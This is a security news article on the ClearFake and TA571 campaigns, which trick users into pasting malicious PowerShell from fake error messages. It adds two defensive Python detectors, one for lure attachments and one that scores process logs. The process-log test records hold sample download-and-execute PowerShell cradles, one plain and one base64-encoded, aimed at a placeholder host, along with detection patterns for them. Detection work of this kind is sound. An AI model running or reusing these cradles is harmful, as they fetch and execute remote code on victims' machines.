New Social Engineering Trick: Hackers Use PowerShell to Spread Malware!

Attackers are using a social engineering technique that gets users to run malicious PowerShell scripts themselves: a fake error message instructs the victim to copy a script and paste it into PowerShell, which infects the system with malware such as DarkGate or information stealers.

The technique, observed since March 2024, is delivered through both malspam and compromised websites, which present the malicious script in popups.

Malicious fake warning instructing recipients to copy a PowerShell script and run it in the PowerShell Terminal. 

In the ClearFake campaign, attackers compromised legitimate websites and injected malicious scripts into them. The injected code used EtherHiding to load a second script filtered through the Keitaro TDS; if the visitor passed the TDS checks, a fake warning overlay instructed them to copy and run a PowerShell script.

That script flushed the DNS cache, downloaded a further script, and checked system temperatures (likely an anti-sandbox check). If those checks passed, it downloaded an AES-encrypted PowerShell script that retrieved a data.zip archive.

The archive contained legitimate executables that side-loaded a trojanized DLL. That DLL used DOILoader to load Lumma Stealer, which in turn downloaded additional malware: Amadey Loader, a downloader for a crypto miner, a clipboard hijacker, and potentially JaskaGO.

Example ClearFake attack chain.  

In April 2024, Proofpoint researchers found compromised websites injecting an iframe served from pley[.]es. The iframe displayed a fake error message that tricked users into running a PowerShell script which would download Vidar Stealer; the payload domain was taken down shortly afterwards, rendering that initial attack ineffective.

Days later, the iframe content was replaced with a ClearFake injection that was still active as of June 2024. It is unclear whether these are two separate attacks or whether the ClearFake actor took over the compromised iframe.

iframe content as of 07 June 2024.

TA571 Campaign:

TA571, a spam distributor, launched email campaigns with HTML attachments disguised as Microsoft Word or OneDrive documents. The attachments displayed fake error messages prompting users to click a “How to Fix” or “Auto-Fix” button.

Clicking the button copied a malicious PowerShell command to the clipboard and instructed the user to execute it through the PowerShell terminal or the Run dialog; the command downloaded and installed malware such as Matanbuchus, DarkGate, or NetSupport RAT.

To avoid detection, TA571 updates its lures regularly and employs evasion strategies such as padding the attachments.

HTML attachment containing instructions on how to copy and paste PowerShell that leads to the installation of malware. 
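A mail-gateway style check for this kind of attachment, as an added example that is not code from the article, from Proofpoint or from the actors it describes: it scans an HTML attachment for clipboard-writing JavaScript, the “How to Fix” style wording, base64 literals that decode to a shell command, and the attachment padding the article mentions. The indicator list, the weights, and the constructed sample attachment (which carries a harmless placeholder command) are all assumptions made for the illustration.

```python
"""Heuristic scan of an HTML email attachment for the copy-to-clipboard lure.

Added example, not from the article or the vendors it cites. SAMPLE_LURE is a
constructed attachment that mimics only the structure the article describes
(fake document error, a "How to Fix" button, a script copied to the clipboard)
and carries a harmless placeholder command.
"""
import base64
import re
from html import unescape

# Assumed indicators: browser clipboard APIs a lure needs to place text on the clipboard.
CLIPBOARD_APIS = [
    ("navigator.clipboard", r"navigator\.clipboard\.writeText"),
    ("execCommand_copy", r"execCommand\(\s*['\"]copy['\"]\s*\)"),
]
# Wording taken from the lure style described in the article, plus generic paste wording.
LURE_PHRASES = ["how to fix", "auto-fix", "powershell", "run dialog", "paste"]
SHELL_TOKENS = re.compile(
    r"(powershell|pwsh|cmd\.exe|mshta|\biex\b|Invoke-Expression|-encodedcommand|\s-enc\s)", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
SUSPICIOUS_THRESHOLD = 6  # assumed cut-off


def decode_b64_literal(literal: str) -> str:
    """Decode a quoted base64 literal; use UTF-16LE when the bytes look like it."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="ignore")
    return raw.decode("utf-8", errors="ignore")


def visible_text(html: str) -> str:
    """Lower-cased text a recipient would see: no scripts, styles, comments or tags."""
    no_script = re.sub(r"<(script|style)\b.*?</\1>", " ", html, flags=re.S | re.I)
    no_comment = re.sub(r"<!--.*?-->", " ", no_script, flags=re.S)
    text = re.sub(r"<[^>]+>", " ", no_comment)
    return re.sub(r"\s+", " ", unescape(text)).strip().lower()


def padding_ratio(html: str) -> float:
    """Fraction of the attachment made of HTML comments or whitespace outside them."""
    if not html:
        return 0.0
    comment_len = sum(len(c) for c in re.findall(r"<!--.*?-->", html, flags=re.S))
    rest = re.sub(r"<!--.*?-->", "", html, flags=re.S)
    ws_len = sum(1 for ch in rest if ch.isspace())
    return (comment_len + ws_len) / len(html)


def scan_html_attachment(html: str) -> dict:
    """Return a score, the indicators that fired and any decoded shell commands."""
    indicators, score, decoded_cmds = [], 0, []
    scripts = " ".join(re.findall(r"<script\b[^>]*>(.*?)</script>", html, flags=re.S | re.I))
    for name, pattern in CLIPBOARD_APIS:
        if re.search(pattern, scripts):
            indicators.append("clipboard_api:" + name)
            score += 3
    hits = [p for p in LURE_PHRASES if p in visible_text(html)]
    if hits:
        indicators.append("lure_phrases:" + ",".join(hits))
        score += len(hits)
    if SHELL_TOKENS.search(scripts):
        indicators.append("shell_tokens_in_script")
        score += 2
    for literal in B64_LITERAL.findall(html):
        decoded = decode_b64_literal(literal)
        if decoded and SHELL_TOKENS.search(decoded):
            decoded_cmds.append(decoded)
            score += 3
    if decoded_cmds:
        indicators.append("encoded_shell_command")
    ratio = padding_ratio(html)
    if ratio > 0.5:  # assumed: more than half the file is filler
        indicators.append("padded_attachment")
        score += 1
    return {"score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD,
            "indicators": indicators, "decoded_commands": decoded_cmds,
            "padding_ratio": round(ratio, 2)}


# Constructed sample attachment; the command is a harmless placeholder.
PLACEHOLDER_CMD = 'powershell -c "Write-Host constructed-sample"'
_B64 = base64.b64encode(PLACEHOLDER_CMD.encode()).decode()
_PADDING = "<!-- " + "\n" * 4000 + " -->"  # stands in for the padding TA571 adds
SAMPLE_LURE = "".join([
    "<!doctype html><html><head><title>Document.docx</title></head><body>\n",
    _PADDING, "\n",
    "<h2>Word Online</h2>\n",
    "<p>The document could not be displayed. Click How to Fix, then paste the copied fix into PowerShell.</p>\n",
    '<button onclick="fix()">How to Fix</button>\n',
    "<script>\nvar enc = \"__B64__\";\n",
    "function fix() { navigator.clipboard.writeText(atob(enc)); }\n",
    "</script></body></html>\n",
]).replace("__B64__", _B64)
BENIGN_HTML = "<html><body><p>Quarterly report attached as PDF.</p></body></html>"

if __name__ == "__main__":
    for label, doc in (("sample lure", SAMPLE_LURE), ("benign", BENIGN_HTML)):
        print(label, scan_html_attachment(doc))
```

The scanner deliberately inspects the visible text and the script text separately: the visible text carries the lure wording the victim reads, while the script text carries the clipboard call and the encoded command, and a detection that fires on the combination is harder to evade with padding or re-encoding than one that keys on a single string.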

Both TA571 and ClearFake use browser-based JavaScript, in HTML attachments or on compromised websites, to place PowerShell or CMD scripts on the clipboard; the scripts are encoded in various ways before being copied.

The technique is aimed at evading antivirus and EDR: the malicious code runs straight from the clipboard without a file being written to disk. Pasting the script into the PowerShell terminal gives one-click execution, whereas ClearFake uses the Run dialog, which may give users pause to review the command before executing it.
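On the endpoint, the chain described above still leaves a process-creation trail: a PowerShell process started from the Run dialog whose command line flushes DNS, pulls a second stage and evaluates it. The following scoring heuristic is an added example, not code from the article or from any vendor it cites; the Sysmon-style records, the indicator patterns and weights, and the assumption that Run-dialog launches appear with explorer.exe as the parent process are all constructed for the illustration.

```python
"""Score process-creation records for the paste-and-run PowerShell pattern.

Added example: not code from the article or from the vendors it cites. The
records are constructed to resemble Sysmon Event ID 1 fields (Image,
CommandLine, ParentImage). The indicator list and the Run-dialog heuristic
(explorer.exe as parent) are assumptions derived from the chain the article
describes, not observed campaign data.
"""
import base64
import re
from dataclasses import dataclass, field

SUSPICIOUS_THRESHOLD = 5  # assumed cut-off

# (name, pattern, weight), matched case-insensitively against the command line
# plus any decoded -EncodedCommand payload.
INDICATORS = [
    ("flush_dns", r"ipconfig\s+/flushdns", 2),
    ("download_cradle",
     r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient)", 2),
    ("invoke_expression", r"(Invoke-Expression|\biex\b)", 2),
    ("hidden_window", r"-w(indowstyle)?\s+h(idden)?\b", 1),
    ("no_profile", r"-nop(rofile)?\b", 1),
    ("bypass_policy", r"-e(p|xecutionpolicy)\s+bypass", 1),
    ("encoded_command", r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2),
    ("aes_decrypt",
     r"(System\.Security\.Cryptography|CreateDecryptor|Aes(Managed|CryptoServiceProvider)|\[Aes\])", 1),
    ("archive_expand", r"(Expand-Archive|data\.zip)", 1),
]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind a -EncodedCommand argument, or '' if none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


@dataclass
class Finding:
    score: int = 0
    indicators: list = field(default_factory=list)
    run_dialog_parent: bool = False

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def score_record(record: dict) -> Finding:
    """Score one process-creation record; non-PowerShell images score zero."""
    finding = Finding()
    if not record.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return finding
    cmd = record.get("CommandLine", "")
    haystack = cmd + "\n" + decode_encoded_command(cmd)  # scan the decoded payload too
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, haystack, re.I):
            finding.indicators.append(name)
            finding.score += weight
    # Assumption: a command pasted into the Run dialog (Win+R) is spawned by the
    # shell, so the parent is explorer.exe rather than a script host or agent.
    if record.get("ParentImage", "").lower().endswith("explorer.exe") and finding.score > 0:
        finding.run_dialog_parent = True
        finding.score += 2
    return finding


def triage(records: list) -> list:
    """Labels of the records that cross the threshold, in input order."""
    return [r["Label"] for r in records if score_record(r).suspicious]


# Constructed records. example.invalid is a reserved, non-resolving name.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_STAGE2 = "ipconfig /flushdns; iex (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"Label": "admin inventory script", "Image": _PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Label": "pasted into Run dialog (plain)", "Image": _PS,
     "CommandLine": "powershell -w hidden -ep bypass -c \"ipconfig /flushdns; "
                    "iex (iwr 'https://example.invalid/stage2.txt' -UseBasicParsing)\"",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Label": "pasted into Run dialog (encoded)", "Image": _PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENCODED,
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        f = score_record(rec)
        print(f"{rec['Label']}: score={f.score} run_dialog={f.run_dialog_parent} {f.indicators}")
    print("flagged:", triage(SAMPLE_RECORDS))
```

Decoding the -EncodedCommand payload before matching is what keeps the encoded variant from scoring lower than the plain one; the parent-process bonus is kept separate so that the same indicators fired from a scheduler or management agent still surface, only with a lower score.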

Kaaviya (https://cyberpress.org/) is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
